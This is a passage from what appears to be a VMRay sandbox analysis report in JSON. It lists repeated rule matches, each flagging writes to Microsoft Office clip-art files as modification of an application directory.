"technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0285822.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285822.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38314", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0285822.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287018.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287018.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38321", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287018.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287019.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287019.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38330", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287019.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287020.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287020.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38341", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287020.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287024.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287024.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38352", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287024.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287408.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287408.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38365", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287408.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287415.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287415.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38378", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287415.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287417.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287417.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38389", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287417.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287641.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287641.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38402", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287641.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287642.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287642.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38413", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287642.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287643.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287643.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38422", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287643.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287644.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287644.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38429", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287644.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0287645.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287645.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38438", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0287645.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0289430.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0289430.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38449", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0289430.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0290548.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0290548.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38456", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0290548.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0291794.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0291794.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38467", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0291794.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292248.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292248.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38474", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292248.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292270.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292270.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38481", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292270.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292272.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292272.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38490", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292272.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292278.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292278.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38497", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292278.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0292286.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292286.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38504", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0292286.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293800.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0293800.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38513", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0293800.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0293832.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0293832.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38520", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0293832.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294989.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0294989.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38527", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0294989.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0294991.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0294991.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38534", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0294991.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0295069.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0295069.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38543", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0295069.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296277.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296277.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38550", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296277.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296279.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296279.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38563", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296279.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0296288.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296288.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38578", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0296288.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297229.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297229.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38593", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297229.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297269.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297269.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38602", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297269.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297725.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297725.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_38609", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297725.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0297727.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0297727.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { 